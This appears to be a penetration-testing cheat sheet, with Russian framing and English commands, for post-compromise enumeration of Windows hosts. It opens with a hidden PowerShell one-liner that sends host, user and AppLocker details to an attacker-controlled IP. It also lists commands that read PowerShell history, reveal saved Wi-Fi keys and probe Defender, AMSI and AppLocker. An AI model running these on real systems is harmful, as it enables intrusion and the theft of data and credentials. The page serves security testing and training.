Windows
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Закрепите текущий уровень доступа и соберите контекст (ОС, сеть, домен).
- Минимизируйте шум: избегайте лишних действий вне scope.
- Документируйте команды и вывод для отчёта.
- Ниже — заголовки и примеры команд на английском.
Методика
General information exfiltration
C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"
PowerShell History
c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
User and group enumeration
whoami
echo %username%
Privileges
whoami /all
whoami /priv
Groups
net localgroup
net localgroup "<Group>"
# View Domain Groups
net "<Group>" /domain
Operative system
wmic os get osarchitecture
ver
systeminfo
cmd /c set
echo %USERDOMAIN% -> Returns domain name
systeminfo | findstr /B /C:"Domain"
Get-WMIObject Win32_ComputerSystem | Select-Object Name, Domain
Network enumeration
C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
netstat -ano
route print
ipconfig /all
net share
net1 share
Get-SmbServerConfiguration | select EnableSecuritySignature
net view
Status firewall
Deprecated command
# Check if Windows Defender is enabled
Get-MpComputerStatus
# Check if firewall it is enabled
Get-NetFirewallProfile | Select-Object Name,Enabled
# Allowed Firewall Ports
Get-NetFirewallRule | Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -ne 'Any' }
# Blocked ports/applications
Get-NetFirewallRule -PolicyStore ActiveStore | where {$_.Action -eq "Block"}
1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear
arp -a
Constrained Language Enabled (CLM)
$ExecutionContext.SessionState.LanguageMode
# If enabled it wouldn't work
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")
AMSI
# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'
# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
AppLocker
ApGet-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize
Files Enumeration
PowerShell History
type c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
Disks
# CMD
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
C 19,69 9,70 FileSystem C:\ Users
W 2,52 17,48 FileSystem W:\
Alternate Data Streams
dir /r
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe | prueba.txt:pepe
gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden
Permissions
# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize
# Directory / File permissions
icacls "<Path>"
Simple Rights
| Mask | Permission |
|---|---|
| F | Full access |
| M | Modify access |
| RX | Read and execute access |
| R | Read-only access |
| W | Write-only access |
Specific Rights
| Mask | Permission |
|---|---|
| D | Delete |
| RC | Read control |
| WDAC | Write DAC |
| WO | Write Owner |
| S | Synchronize |
| AS | Access System security |
| MA | Maximum Allowed |
| GR | Generic Read |
| GW | Generic Write |
| GE | Generic Execute |
| GA | Generic All |
| RD | Read Data / List Directory |
| WD | Write Data / Add File |
| AD | Append Data / Add subdirectory |
| REA | Read Extended Attributes |
| WEA | Writer Extended Attributes |
| X | Execute |
| DC | Delete Child |
| RA | Read Attributes |
| WA | Write Attributes |
Inheritance righsts (Applied only to directories)
| Mask | Permission |
|---|---|
| OI | Object Inherit |
| CI | Container Inherit |
| IO | Inherit Only |
| NP | Do not propagate inherit |
| I | Permission inherited from parent container |
Service rights
| Mask | Permission | Meaning |
|---|---|---|
| CC | SERVICE QUERY CONFIG | Ask the SCM for the service’s current configuration |
| LC | SERVICE QUERY STATUS | Ask the SCM for the service’s current status |
| SW | SERVICE ENUMERATE DEPENDENTS | List dependent services |
| LO | SERVICE INTERROGATE | Ask the service its current status |
| CR | SERVICE USER_DEFINED CONTROL | Send a service control defined by the service’s author |
| RC | READ CONTROL | Read the security descriptor on this service. |
| RP | SERVICE START | Start the service |
| WP | Service stop | Stop the service |
| DT | Service Pause continue | Pause or continue the service |
List Installed HotFixes
Get-Hotfix
Running processes
tasklist
Scheduled Tasks
(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>